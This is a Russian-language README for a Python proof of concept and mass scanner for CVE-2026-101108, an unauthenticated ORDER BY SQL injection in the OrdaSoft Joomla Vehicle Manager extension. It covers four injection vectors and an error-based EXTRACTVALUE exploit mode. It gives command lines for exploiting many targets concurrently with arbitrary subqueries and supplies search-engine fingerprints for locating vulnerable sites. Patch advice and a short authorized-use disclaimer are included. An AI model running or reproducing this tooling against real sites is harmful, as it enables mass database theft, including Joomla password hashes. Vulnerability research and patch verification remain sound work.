
Python 3 PoC и массовый сканер для CVE-2026-101108 — неаутентифицированной SQL-инъекции через ORDER BY в OrdaSoft Joomla Vehicle Manager <=6.5.7 (com_vehiclemanager).
Python 3 PoC для CVE-2026-101108 — расширение Joomla OrdaSoft Vehicle Manager (Free) ≤ 6.5.7. Исправлено в 6.5.8+.
| PoCbit | https://pocbit.org/pocs/cve-2026-101108 |
| Каталог | https://pocbit.org/pocs/ |
| Компонент | com_vehiclemanager |
| Файл | site/vehiclemanager.php |
| Параметры | order_field, order_direction → ORDER BY (без кавычек) |
| Аутентификация | Отсутствует (публичные представления категории / поиска / всех автомобилей) |
| CWE | CWE-89 SQL Injection |
| CVSS 4.0 | 9.3 Critical (Joomla CNA) |
Vehicle Manager (Free) — это расширение OrdaSoft, предоставляющее в Joomla объявления об автомобилях (категория, поиск, все автомобили). В версиях 6.5.7 и более ранних параметры сортировки order_field и order_direction обрабатываются в site/vehiclemanager.php: к входным данным применяется экранирование (escaping), однако, поскольку значение помещается в ORDER BY без кавычек, экранирование оказывается неэффективным против SQLi (описание CNA).
Без аутентификации злоумышленник может читать/записывать базу данных, что создаёт критический риск для хэшей пользователей Joomla и целостности сайта. Обновитесь до версии 6.5.8 или новее.
Типичный код Joomla/PHP может пропускать пользовательский ввод через «санитайзер», который экранирует кавычки для строковых литералов. В ORDER BY имена столбцов и выражения не являются строковыми литералами — ключ сортировки конкатенируется как структура SQL. Злоумышленник передаёт выражения, такие как подзапросы на основе ошибок, вместо настоящего имени столбца. Текст CNA для CVE-2026-101108 явно документирует этот паттерн обхода экранирования.
Затронутые анонимные точки входа фронтенда:
showCategory)search / связанные задачи)showVehicles и аналогичные)| Режим | Поведение |
|---|---|
| check | Определение компонента + версии манифеста, обнаружение catid/Itemid, подтверждение SQLi |
| exploit | Двойной запрос на основе ошибок в стиле EXTRACTVALUE через ORDER BY |
| mass | --list + -j для массовой проверки или массового извлечения |
Используемые векторы инъекции (в режиме exploit побеждает первый успешный):
order_field GETorder_direction GET (asc,<subquery>)order_field POSTorder_direction POSTПоля JSONL: pocbit, pocbit_catalog, pocbit_page, cve, component.
cd CVE-2026-101108
pip install -r requirements.txt
python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive
python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --subquery "SELECT user()"
python poc.py -u https://target.example --mode exploit --vector order_direction_get
python poc.py --list targets.example.txt --mode check -j 40 --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 15 --subquery "SELECT VERSION()" --exploited-list exploited.txt
| Флаг | Значение |
|---|---|
--aggressive | Режим check также пытается извлечь SELECT VERSION() |
--subquery | Внутренний SELECT для payload на основе ошибок (MySQL) |
--vector | Принудительно использовать один из четырёх векторов ORDER BY |
--exploited-list | Утечки, разделённые табуляцией, при успешной эксплуатации |
--no-color | Простой CLI (учитывается NO_COLOR) |
Коды выхода: режим exploit — 0 при exploited: true; режим check — 0 при exploitable_candidate.
Маршрут категории (параметры сортировки добавляются PoC):
GET /index.php?option=com_vehiclemanager&task=showCategory&catid=1&order_field=<payload>&order_direction=asc HTTP/1.1
Базовый маршрут поиска, формируемый PoC:
GET /index.php?option=com_vehiclemanager&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=all&transmission=all HTTP/1.1
Когда доступно для чтения:
/administrator/components/com_vehiclemanager/vehiclemanager.xmlВерсия ≤ 6.5.7 → likely_vulnerable_version. ≥ 6.5.8 → patched_version.
body="option=com_vehiclemanager"
body="/components/com_vehiclemanager/" && body="Joomla"
title="Vehicle" && body="com_vehiclemanager"
body="ordasoft" && body="vehiclemanager"
Экспортируйте хосты в targets.txt (по одному базовому URL на строку), затем выполняйте check → hits → exploit только на авторизованных ресурсах.
То же окно раскрытия, что и у CVE Real Estate Manager (например, CVE-2026-100752 / CVE-2026-100753): несколько расширений OrdaSoft для Joomla получили исправления SQLi/XSS. Если вы используете Vehicle Manager, пропатчите все развёрнутые вами компоненты OrdaSoft.
| CVE | Продукт | Проблема | Исправлено |
|---|---|---|---|
| CVE-2026-101108 | Vehicle Manager (Free) | Неаутентифицированная ORDER BY SQLi | 6.5.8 |
| CVE-2026-100752 | Real Estate Manager | Неаутентифицированная ORDER BY SQLi | 6.7.9 |
Благодарность (CNA): Ala Arfaoui.
com_vehiclemanager SQLi (более старые версии, параметры поиска) — отличается от данной, но относится к связанной поверхности компонентаТолько авторизованное тестирование безопасности и проверка патчей.
CVE-2026-101108 PoC: OrdaSoft Joomla Vehicle Manager (Free) <=6.5.7 unauth SQLi — order_field/order_direction unquoted ORDER BY (com_vehiclemanager). Colored check + mass exploit, CVSS 9.3. https://pocbit.org/pocs/cve-2026-101108